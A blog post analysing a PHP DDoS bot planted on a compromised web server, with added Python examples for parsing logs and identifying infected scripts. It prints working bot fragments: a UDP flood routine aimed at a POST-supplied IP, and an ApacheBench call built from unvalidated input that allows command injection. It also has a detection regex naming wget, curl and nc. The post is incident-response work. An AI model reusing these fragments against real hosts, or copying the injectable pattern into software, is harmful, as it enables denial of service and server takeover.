PHP DDOS bot walks around servers

    Today, at about two in the morning, just as I was about to go to bed, a friend of mine wrote to me on Skype. Last year I had helped him administer several of his servers. At that late hour he wrote that, judging by the MRTG graph, the network interface of one of his servers was completely saturated. I looked, and indeed I could not even reach it over ssh; the server was rebooted and the analysis of the situation began...


    Analysis of the situation

    After the reboot, the traffic reappeared after a while. I launched iptraf; it showed a very large number of UDP packets going to a single IP address, 171.161.224.16. When I resolved it to dns5.bankofamerica.com, everything fell into place: the server was obviously the source of a DDoS.

    I banned the IP in iptables. I looked at top: one of the httpd processes was eating 100% CPU. I attached strace to it and saw the same familiar address. Since there were no access_logs on the server and the error_logs were empty, I turned to the logs of the excellent php module baxtep (article on Habr), which logs every attempt to execute a command through the PHP interpreter. I built an RPM of it and always install it on the servers I look after, just in case. From the log it was easy to spot the name of the script I was looking for (the file's code is available at the link). I googled the string itsoknoproblembro from the file; Google returned only one result, so I decided the sample was fresh and worth writing up here.

    2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
    2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl-bin` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
    2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl-cgi` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php
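The BAXTEP lines above have a fixed shape, so the "which script is doing this" question can be answered by a small parser instead of by eye. The following Python is an added example, not code from the post or from the baxtep module: it parses that format, counts logged commands per PHP file, and flags commands a web application normally has no reason to run. The first three sample lines are copied from the post; the `ab` line and the benign `convert` line are constructed for the example (the target host, the `exec` call and the line numbers in them are placeholders), and the suspicious-pattern list is an assumed starting point to tune per site.

```python
import re
from collections import Counter

# Pattern for the BAXTEP log format shown above:
# "<date> <time> BAXTEP: <function> CMDLINE: `<command>` FILE: <path> on line <n> URI: <uri>"
BAXTEP_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) BAXTEP: (?P<func>\w+) "
    r"CMDLINE: `(?P<cmd>.*)` FILE: (?P<file>\S+) on line (?P<line>\d+) URI: (?P<uri>\S+)$"
)

# Process killers, load tools, script interpreters, downloaders, and shell
# metacharacters that hint at injected input. Assumption: a starting list only.
SUSPICIOUS_RE = re.compile(r"\b(killall|pkill|ab|perl|python|wget|curl|nc)\b|[;&|`$]")

# Three lines copied from the post; the last two are constructed samples.
SAMPLE_LOG = [
    "2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php",
    "2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl-bin` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php",
    "2012-01-12 22:46:33 BAXTEP: system CMDLINE: `killall -9 perl-cgi` FILE: /home/user/site/htdocs/dir/db/indx.php on line 19 URI: /dir/db/indx.php",
    "2012-01-12 22:47:05 BAXTEP: system CMDLINE: `ab -c 50 -n 10000 http://target.example/` FILE: /home/user/site/htdocs/dir/db/indx.php on line 40 URI: /dir/db/indx.php",
    "2012-01-12 22:50:11 BAXTEP: exec CMDLINE: `convert in.png out.jpg` FILE: /home/user/site/htdocs/upload.php on line 12 URI: /upload.php",
]


def parse_line(line):
    """Return a dict for one BAXTEP line, or None if the line does not match the format."""
    m = BAXTEP_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["line"] = int(rec["line"])
    rec["suspicious"] = SUSPICIOUS_RE.search(rec["cmd"]) is not None
    return rec


def summarize(lines):
    """Parse all lines, count logged commands per script file and collect flagged ones."""
    records = [r for r in (parse_line(l) for l in lines) if r is not None]
    per_file = Counter(r["file"] for r in records)
    flagged = [r for r in records if r["suspicious"]]
    top_file = per_file.most_common(1)[0][0] if per_file else None
    return {"records": records, "per_file": per_file, "flagged": flagged, "top_file": top_file}


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    print("most active script:", s["top_file"])
    for r in s["flagged"]:
        print(f'{r["ts"]} {r["file"]}:{r["line"]} {r["cmd"]!r}')
```

Run it over a real baxtep log with `summarize(open(path).readlines())`; the file with the most logged commands, and the flagged commands themselves, are the first places to look after a reboot like the one described above.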



    Code analysis

    The file is only 3 KB and the code is not complicated. Key features of the bot:
    • uploading files to the server
    • DDoS with a large number of UDP packets
    • DDoS via the ab (ApacheBench) utility

    I will dwell in more detail on DDoS.

      case "ust":
        // target IP comes straight from the POST request; the destination port is hard-coded
        $page = curPageURL();
        $ip = $_POST['ip'];
        $port = "11";
        // the datagram body is this script's own URL
        $out = $page."\n";
        $socket = stream_socket_client("udp://$ip:$port");
        if ($socket) {
          stream_set_write_buffer($socket, 0);
          stream_socket_sendto($socket,$out);
        }
        fclose($socket);
      break;

    The script receives the address of the target through a POST parameter, opens a UDP socket and, provided the socket was opened successfully, sends a datagram to port 11. Curiously, the data it sends is the script's own address:

    // builds the URL of the current request from $_SERVER
    function curPageURL(){
      $pageURL = 'http';
      if ($_SERVER["HTTPS"] == "on") {
        $pageURL .= "s";
      }
      $pageURL .= "://";
      // the port is appended only when it is not the default 80
      if ($_SERVER["SERVER_PORT"] != "80") {
        $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
      } else {
        $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
      }
      return $pageURL;
    }

    The question "Why?" hasn't left my head for 12 hours.
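Whatever the motive, that payload has a practical consequence for whoever is on the receiving end: every datagram carries the URL of the infected script that sent it, so a capture of the port 11 flood identifies the compromised hosts without any lookup. The following Python is an added example, not code from the post: it decodes datagram bodies built the way curPageURL does (URL plus newline), discards anything that is not an http(s) URL, and ranks the self-reported sources by volume. The sample datagrams and host names are constructed placeholders.

```python
from collections import Counter
from urllib.parse import urlsplit


def infected_script_from_payload(payload):
    """Decode one UDP datagram body as the bot builds it: its own URL plus a newline.

    Returns the URL's components, or None when the payload is not an http(s) URL.
    """
    text = payload.decode("utf-8", errors="replace").strip()
    parts = urlsplit(text)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    return {
        "url": text,
        "scheme": parts.scheme,
        "host": parts.hostname,
        # curPageURL omits the port only when it is 80, so fill in the default
        "port": parts.port or (443 if parts.scheme == "https" else 80),
        "path": parts.path,
    }


def rank_sources(datagrams):
    """Count datagrams per self-reported script URL, most frequent first."""
    counts = Counter()
    for body in datagrams:
        info = infected_script_from_payload(body)
        if info is not None:
            counts[info["url"]] += 1
    return counts.most_common()


# Constructed sample of what a capture of port 11 traffic at the victim might
# contain; the host names are placeholders, not real infected servers.
SAMPLE_DATAGRAMS = [
    b"http://compromised-a.example/dir/db/indx.php\n",
    b"http://compromised-a.example/dir/db/indx.php\n",
    b"http://compromised-a.example/dir/db/indx.php\n",
    b"https://compromised-b.example:8443/img/cache.php\n",
    b"not a url at all",
]

if __name__ == "__main__":
    for url, n in rank_sources(SAMPLE_DATAGRAMS):
        info = infected_script_from_payload(url.encode())
        print(f"{n:5d}  {info['host']}:{info['port']}  {info['path']}")
```

The ranked list is exactly what an abuse report to each hosting provider needs: the host, the port the web server listens on, and the path of the script to remove.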

    The second attack method is through the ab utility:

      case "ab":
        // c = concurrency, n = number of requests, url = target; none of them is validated
        $url = $_POST['url'];
        $c = $_POST['c'];
        $n = $_POST['n'];
        cmdexec("ab -c $c -n $n $url");
      break;

    Moreover, there is no validation of the incoming parameters at all: they are interpolated straight into the shell command line, so arbitrary commands can be executed on the server.

    I had personally never come across a UDP DDoS in PHP before, and we had never been flooded with one; a quick Google search shows that people have apparently been practicing this, in various flavours, for a long time.

    Conclusions

    • As practice has shown, such a script easily saturates the entire available channel.
    • The situation was possible because outbound UDP was not strictly filtered on the server.
    • Someone decided to take BOA down :)
